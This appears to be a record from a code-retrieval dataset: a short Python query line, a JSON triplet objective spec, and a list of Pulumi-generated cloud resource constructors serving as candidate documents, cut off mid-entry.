self.external_object_map if "table_initialization" in ext_objs.keys(): self.table_initialization = ext_objs["table_initialization"]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n add_on: Optional[pulumi.Input[pulumi.InputType['InstanceAddOnArgs']]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n blueprint_id: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n additional_info: Optional[pulumi.Input[str]] = None,\n affinity: Optional[pulumi.Input[str]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n block_device_mappings: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceBlockDeviceMappingArgs']]]] = None,\n cpu_options: Optional[pulumi.Input['InstanceCpuOptionsArgs']] = None,\n credit_specification: Optional[pulumi.Input['InstanceCreditSpecificationArgs']] = None,\n disable_api_termination: Optional[pulumi.Input[bool]] = None,\n ebs_optimized: Optional[pulumi.Input[bool]] = None,\n elastic_gpu_specifications: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceElasticGpuSpecificationArgs']]]] = None,\n elastic_inference_accelerators: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceElasticInferenceAcceleratorArgs']]]] = None,\n enclave_options: Optional[pulumi.Input['InstanceEnclaveOptionsArgs']] = None,\n hibernation_options: Optional[pulumi.Input['InstanceHibernationOptionsArgs']] = None,\n host_id: Optional[pulumi.Input[str]] = None,\n host_resource_group_arn: Optional[pulumi.Input[str]] = None,\n iam_instance_profile: Optional[pulumi.Input[str]] = None,\n image_id: Optional[pulumi.Input[str]] = None,\n instance_initiated_shutdown_behavior: Optional[pulumi.Input[str]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ipv6_address_count: Optional[pulumi.Input[int]] = None,\n ipv6_addresses: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpv6AddressArgs']]]] = None,\n kernel_id: Optional[pulumi.Input[str]] = None,\n key_name: Optional[pulumi.Input[str]] = None,\n launch_template: Optional[pulumi.Input['InstanceLaunchTemplateSpecificationArgs']] = None,\n license_specifications: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceLicenseSpecificationArgs']]]] = None,\n monitoring: Optional[pulumi.Input[bool]] = None,\n network_interfaces: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkInterfaceArgs']]]] = None,\n placement_group_name: Optional[pulumi.Input[str]] = None,\n private_dns_name_options: Optional[pulumi.Input['InstancePrivateDnsNameOptionsArgs']] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n propagate_tags_to_volume_on_creation: Optional[pulumi.Input[bool]] = None,\n ramdisk_id: Optional[pulumi.Input[str]] = None,\n security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n source_dest_check: Optional[pulumi.Input[bool]] = None,\n ssm_associations: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceSsmAssociationArgs']]]] = None,\n subnet_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceTagArgs']]]] = None,\n tenancy: Optional[pulumi.Input[str]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n volumes: 
Optional[pulumi.Input[Sequence[pulumi.Input['InstanceVolumeArgs']]]] = None):\n if additional_info is not None:\n pulumi.set(__self__, \"additional_info\", additional_info)\n if affinity is not None:\n pulumi.set(__self__, \"affinity\", affinity)\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if block_device_mappings is not None:\n pulumi.set(__self__, \"block_device_mappings\", block_device_mappings)\n if cpu_options is not None:\n pulumi.set(__self__, \"cpu_options\", cpu_options)\n if credit_specification is not None:\n pulumi.set(__self__, \"credit_specification\", credit_specification)\n if disable_api_termination is not None:\n pulumi.set(__self__, \"disable_api_termination\", disable_api_termination)\n if ebs_optimized is not None:\n pulumi.set(__self__, \"ebs_optimized\", ebs_optimized)\n if elastic_gpu_specifications is not None:\n pulumi.set(__self__, \"elastic_gpu_specifications\", elastic_gpu_specifications)\n if elastic_inference_accelerators is not None:\n pulumi.set(__self__, \"elastic_inference_accelerators\", elastic_inference_accelerators)\n if enclave_options is not None:\n pulumi.set(__self__, \"enclave_options\", enclave_options)\n if hibernation_options is not None:\n pulumi.set(__self__, \"hibernation_options\", hibernation_options)\n if host_id is not None:\n pulumi.set(__self__, \"host_id\", host_id)\n if host_resource_group_arn is not None:\n pulumi.set(__self__, \"host_resource_group_arn\", host_resource_group_arn)\n if iam_instance_profile is not None:\n pulumi.set(__self__, \"iam_instance_profile\", iam_instance_profile)\n if image_id is not None:\n pulumi.set(__self__, \"image_id\", image_id)\n if instance_initiated_shutdown_behavior is not None:\n pulumi.set(__self__, \"instance_initiated_shutdown_behavior\", instance_initiated_shutdown_behavior)\n if instance_type is not None:\n pulumi.set(__self__, \"instance_type\", instance_type)\n if ipv6_address_count is not None:\n pulumi.set(__self__, \"ipv6_address_count\", ipv6_address_count)\n if ipv6_addresses is not None:\n pulumi.set(__self__, \"ipv6_addresses\", ipv6_addresses)\n if kernel_id is not None:\n pulumi.set(__self__, \"kernel_id\", kernel_id)\n if key_name is not None:\n pulumi.set(__self__, \"key_name\", key_name)\n if launch_template is not None:\n pulumi.set(__self__, \"launch_template\", launch_template)\n if license_specifications is not None:\n pulumi.set(__self__, \"license_specifications\", license_specifications)\n if monitoring is not None:\n pulumi.set(__self__, \"monitoring\", monitoring)\n if network_interfaces is not None:\n pulumi.set(__self__, \"network_interfaces\", network_interfaces)\n if placement_group_name is not None:\n pulumi.set(__self__, \"placement_group_name\", placement_group_name)\n if private_dns_name_options is not None:\n pulumi.set(__self__, \"private_dns_name_options\", private_dns_name_options)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if propagate_tags_to_volume_on_creation is not None:\n pulumi.set(__self__, \"propagate_tags_to_volume_on_creation\", propagate_tags_to_volume_on_creation)\n if ramdisk_id is not None:\n pulumi.set(__self__, \"ramdisk_id\", ramdisk_id)\n if security_group_ids is not None:\n pulumi.set(__self__, \"security_group_ids\", security_group_ids)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if source_dest_check is not None:\n pulumi.set(__self__, \"source_dest_check\", 
source_dest_check)\n if ssm_associations is not None:\n pulumi.set(__self__, \"ssm_associations\", ssm_associations)\n if subnet_id is not None:\n pulumi.set(__self__, \"subnet_id\", subnet_id)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tenancy is not None:\n pulumi.set(__self__, \"tenancy\", tenancy)\n if user_data is not None:\n pulumi.set(__self__, \"user_data\", user_data)\n if volumes is not None:\n pulumi.set(__self__, \"volumes\", volumes)", "def __init__(__self__, *,\n availability_zone: pulumi.Input[str],\n blueprint_id: pulumi.Input[str],\n bundle_id: pulumi.Input[str],\n add_on: Optional[pulumi.Input['InstanceAddOnArgs']] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n pulumi.set(__self__, \"blueprint_id\", blueprint_id)\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if add_on is not None:\n pulumi.set(__self__, \"add_on\", add_on)\n if ip_address_type is not None:\n pulumi.set(__self__, \"ip_address_type\", ip_address_type)\n if key_pair_name is not None:\n pulumi.set(__self__, \"key_pair_name\", key_pair_name)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if user_data is not None:\n pulumi.set(__self__, \"user_data\", user_data)", "def __init__(__self__, *,\n activation_key: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None):\n if activation_key is not None:\n pulumi.set(__self__, \"activation_key\", activation_key)\n if ip_address is not None:\n pulumi.set(__self__, \"ip_address\", ip_address)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if private_link_endpoint is not None:\n pulumi.set(__self__, \"private_link_endpoint\", private_link_endpoint)\n if security_group_arns is not None:\n pulumi.set(__self__, \"security_group_arns\", security_group_arns)\n if subnet_arns is not None:\n pulumi.set(__self__, \"subnet_arns\", subnet_arns)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if vpc_endpoint_id is not None:\n pulumi.set(__self__, \"vpc_endpoint_id\", vpc_endpoint_id)", "def __init__(__self__, *,\n instance_id: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n file_shares: Optional[pulumi.Input[Sequence[pulumi.Input['FileShareConfigArgs']]]] = None,\n kms_key_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n networks: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkConfigArgs']]]] = None,\n project: Optional[pulumi.Input[str]] = None,\n tier: Optional[pulumi.Input['InstanceTier']] = None):\n pulumi.set(__self__, \"instance_id\", instance_id)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if etag is 
not None:\n pulumi.set(__self__, \"etag\", etag)\n if file_shares is not None:\n pulumi.set(__self__, \"file_shares\", file_shares)\n if kms_key_name is not None:\n pulumi.set(__self__, \"kms_key_name\", kms_key_name)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if networks is not None:\n pulumi.set(__self__, \"networks\", networks)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if tier is not None:\n pulumi.set(__self__, \"tier\", tier)", "def __init__(__self__, *,\n activation_key: Optional[pulumi.Input[str]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None):\n if activation_key is not None:\n pulumi.set(__self__, \"activation_key\", activation_key)\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if ip_address is not None:\n pulumi.set(__self__, \"ip_address\", ip_address)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if private_link_endpoint is not None:\n pulumi.set(__self__, \"private_link_endpoint\", private_link_endpoint)\n if security_group_arns is not None:\n pulumi.set(__self__, \"security_group_arns\", security_group_arns)\n if subnet_arns is not None:\n pulumi.set(__self__, \"subnet_arns\", subnet_arns)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if vpc_endpoint_id is not None:\n pulumi.set(__self__, \"vpc_endpoint_id\", vpc_endpoint_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n activation_key: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n add_on: Optional[pulumi.Input['InstanceAddOnArgs']] = None,\n arn: Optional[pulumi.Input[str]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n blueprint_id: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n cpu_count: Optional[pulumi.Input[int]] = None,\n created_at: Optional[pulumi.Input[str]] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n ipv6_address: Optional[pulumi.Input[str]] = None,\n ipv6_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n is_static_ip: Optional[pulumi.Input[bool]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n public_ip_address: Optional[pulumi.Input[str]] = None,\n ram_size: Optional[pulumi.Input[float]] = None,\n tags: 
Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n username: Optional[pulumi.Input[str]] = None):\n if add_on is not None:\n pulumi.set(__self__, \"add_on\", add_on)\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if blueprint_id is not None:\n pulumi.set(__self__, \"blueprint_id\", blueprint_id)\n if bundle_id is not None:\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if cpu_count is not None:\n pulumi.set(__self__, \"cpu_count\", cpu_count)\n if created_at is not None:\n pulumi.set(__self__, \"created_at\", created_at)\n if ip_address_type is not None:\n pulumi.set(__self__, \"ip_address_type\", ip_address_type)\n if ipv6_address is not None:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n if ipv6_address is not None:\n pulumi.set(__self__, \"ipv6_address\", ipv6_address)\n if ipv6_addresses is not None:\n pulumi.set(__self__, \"ipv6_addresses\", ipv6_addresses)\n if is_static_ip is not None:\n pulumi.set(__self__, \"is_static_ip\", is_static_ip)\n if key_pair_name is not None:\n pulumi.set(__self__, \"key_pair_name\", key_pair_name)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if public_ip_address is not None:\n pulumi.set(__self__, \"public_ip_address\", public_ip_address)\n if ram_size is not None:\n pulumi.set(__self__, \"ram_size\", ram_size)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if user_data is not None:\n pulumi.set(__self__, \"user_data\", user_data)\n if username is not None:\n pulumi.set(__self__, \"username\", username)", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n kms_key: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n schedule_config: Optional[pulumi.Input['DataIntegrationScheduleConfigArgs']] = None,\n source_uri: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if kms_key is not None:\n pulumi.set(__self__, \"kms_key\", kms_key)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if schedule_config is not None:\n pulumi.set(__self__, \"schedule_config\", schedule_config)\n if source_uri is not None:\n pulumi.set(__self__, \"source_uri\", source_uri)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def 
__init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n create_sample_data: Optional[pulumi.Input[bool]] = None,\n db_instance_category: Optional[pulumi.Input[str]] = None,\n db_instance_class: Optional[pulumi.Input[str]] = None,\n db_instance_mode: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n encryption_key: Optional[pulumi.Input[str]] = None,\n encryption_type: Optional[pulumi.Input[str]] = None,\n engine: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_group_count: Optional[pulumi.Input[int]] = None,\n instance_network_type: Optional[pulumi.Input[str]] = None,\n instance_spec: Optional[pulumi.Input[str]] = None,\n ip_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceIpWhitelistArgs']]]]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n master_node_num: Optional[pulumi.Input[int]] = None,\n payment_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n security_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n seg_node_num: Optional[pulumi.Input[int]] = None,\n seg_storage_type: Optional[pulumi.Input[str]] = None,\n ssl_enabled: Optional[pulumi.Input[int]] = None,\n storage_size: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n used_time: Optional[pulumi.Input[str]] = None,\n vector_configuration_status: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n endpoint_type: pulumi.Input[str],\n entry: pulumi.Input[str],\n instance_id: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n module_name: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"endpoint_type\", endpoint_type)\n pulumi.set(__self__, \"entry\", entry)\n pulumi.set(__self__, \"instance_id\", instance_id)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if module_name is not None:\n pulumi.set(__self__, \"module_name\", module_name)", "def __init__(__self__, *,\n description: pulumi.Input[str],\n instance_series: pulumi.Input[str],\n specification: pulumi.Input[str],\n vswitch_id: pulumi.Input[str],\n zone_id: pulumi.Input[str],\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"description\", description)\n pulumi.set(__self__, \"instance_series\", instance_series)\n pulumi.set(__self__, \"specification\", specification)\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n pulumi.set(__self__, \"zone_id\", 
zone_id)\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if mysql_version is not None:\n pulumi.set(__self__, \"mysql_version\", mysql_version)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)", "def __init__(__self__, *,\n description: Optional[pulumi.Input[str]] = None,\n endpoint_type: Optional[pulumi.Input[str]] = None,\n entry: Optional[pulumi.Input[str]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n module_name: Optional[pulumi.Input[str]] = None):\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if endpoint_type is not None:\n pulumi.set(__self__, \"endpoint_type\", endpoint_type)\n if entry is not None:\n pulumi.set(__self__, \"entry\", entry)\n if instance_id is not None:\n pulumi.set(__self__, \"instance_id\", instance_id)\n if module_name is not None:\n pulumi.set(__self__, \"module_name\", module_name)", "def __init__(__self__, *,\n name: pulumi.Input[str],\n type: pulumi.Input[str],\n value: pulumi.Input[str],\n zone_name: pulumi.Input[str],\n priority: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"type\", type)\n pulumi.set(__self__, \"value\", value)\n pulumi.set(__self__, \"zone_name\", zone_name)\n if priority is not None:\n pulumi.set(__self__, \"priority\", priority)\n if ttl is not None:\n pulumi.set(__self__, \"ttl\", ttl)", "def __init__(__self__, *,\n instance_type: pulumi.Input[str],\n major_version: pulumi.Input[str],\n node_count: pulumi.Input[int],\n pay_type: pulumi.Input[str],\n vswitch_id: pulumi.Input[str],\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n password: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"instance_type\", instance_type)\n pulumi.set(__self__, \"major_version\", major_version)\n pulumi.set(__self__, \"node_count\", node_count)\n pulumi.set(__self__, \"pay_type\", pay_type)\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if auto_renew is not None:\n pulumi.set(__self__, \"auto_renew\", auto_renew)\n if auto_renew_period is not None:\n pulumi.set(__self__, \"auto_renew_period\", auto_renew_period)\n if cluster_name is not None:\n pulumi.set(__self__, \"cluster_name\", cluster_name)\n if data_center_name is not None:\n pulumi.set(__self__, \"data_center_name\", data_center_name)\n if disk_size is not None:\n pulumi.set(__self__, \"disk_size\", disk_size)\n if disk_type is not None:\n pulumi.set(__self__, \"disk_type\", disk_type)\n if enable_public is not None:\n pulumi.set(__self__, \"enable_public\", enable_public)\n if ip_white is not None:\n pulumi.set(__self__, \"ip_white\", ip_white)\n if maintain_end_time is not None:\n 
pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if password is not None:\n pulumi.set(__self__, \"password\", password)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if period_unit is not None:\n pulumi.set(__self__, \"period_unit\", period_unit)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__, *,\n db_instance_mode: pulumi.Input[str],\n engine: pulumi.Input[str],\n engine_version: pulumi.Input[str],\n vswitch_id: pulumi.Input[str],\n availability_zone: Optional[pulumi.Input[str]] = None,\n create_sample_data: Optional[pulumi.Input[bool]] = None,\n db_instance_category: Optional[pulumi.Input[str]] = None,\n db_instance_class: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n encryption_key: Optional[pulumi.Input[str]] = None,\n encryption_type: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_group_count: Optional[pulumi.Input[int]] = None,\n instance_network_type: Optional[pulumi.Input[str]] = None,\n instance_spec: Optional[pulumi.Input[str]] = None,\n ip_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n master_node_num: Optional[pulumi.Input[int]] = None,\n payment_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n security_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n seg_node_num: Optional[pulumi.Input[int]] = None,\n seg_storage_type: Optional[pulumi.Input[str]] = None,\n ssl_enabled: Optional[pulumi.Input[int]] = None,\n storage_size: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n used_time: Optional[pulumi.Input[str]] = None,\n vector_configuration_status: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"db_instance_mode\", db_instance_mode)\n pulumi.set(__self__, \"engine\", engine)\n pulumi.set(__self__, \"engine_version\", engine_version)\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if availability_zone is not None:\n warnings.warn(\"\"\"Field 'availability_zone' has been deprecated from version 1.187.0. Use 'zone_id' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"availability_zone is deprecated: Field 'availability_zone' has been deprecated from version 1.187.0. 
Use 'zone_id' instead.\"\"\")\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if create_sample_data is not None:\n pulumi.set(__self__, \"create_sample_data\", create_sample_data)\n if db_instance_category is not None:\n pulumi.set(__self__, \"db_instance_category\", db_instance_category)\n if db_instance_class is not None:\n pulumi.set(__self__, \"db_instance_class\", db_instance_class)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if encryption_key is not None:\n pulumi.set(__self__, \"encryption_key\", encryption_key)\n if encryption_type is not None:\n pulumi.set(__self__, \"encryption_type\", encryption_type)\n if instance_charge_type is not None:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if instance_group_count is not None:\n pulumi.set(__self__, \"instance_group_count\", instance_group_count)\n if instance_network_type is not None:\n pulumi.set(__self__, \"instance_network_type\", instance_network_type)\n if instance_spec is not None:\n pulumi.set(__self__, \"instance_spec\", instance_spec)\n if ip_whitelists is not None:\n pulumi.set(__self__, \"ip_whitelists\", ip_whitelists)\n if maintain_end_time is not None:\n pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if master_node_num is not None:\n pulumi.set(__self__, \"master_node_num\", master_node_num)\n if payment_type is not None:\n pulumi.set(__self__, \"payment_type\", payment_type)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if resource_group_id is not None:\n pulumi.set(__self__, \"resource_group_id\", resource_group_id)\n if security_ip_lists is not None:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. 
Use 'ip_whitelist' instead.\"\"\")\n if security_ip_lists is not None:\n pulumi.set(__self__, \"security_ip_lists\", security_ip_lists)\n if seg_node_num is not None:\n pulumi.set(__self__, \"seg_node_num\", seg_node_num)\n if seg_storage_type is not None:\n pulumi.set(__self__, \"seg_storage_type\", seg_storage_type)\n if ssl_enabled is not None:\n pulumi.set(__self__, \"ssl_enabled\", ssl_enabled)\n if storage_size is not None:\n pulumi.set(__self__, \"storage_size\", storage_size)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if used_time is not None:\n pulumi.set(__self__, \"used_time\", used_time)\n if vector_configuration_status is not None:\n pulumi.set(__self__, \"vector_configuration_status\", vector_configuration_status)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__, *,\n active: Optional[pulumi.Input[bool]] = None,\n annotations: 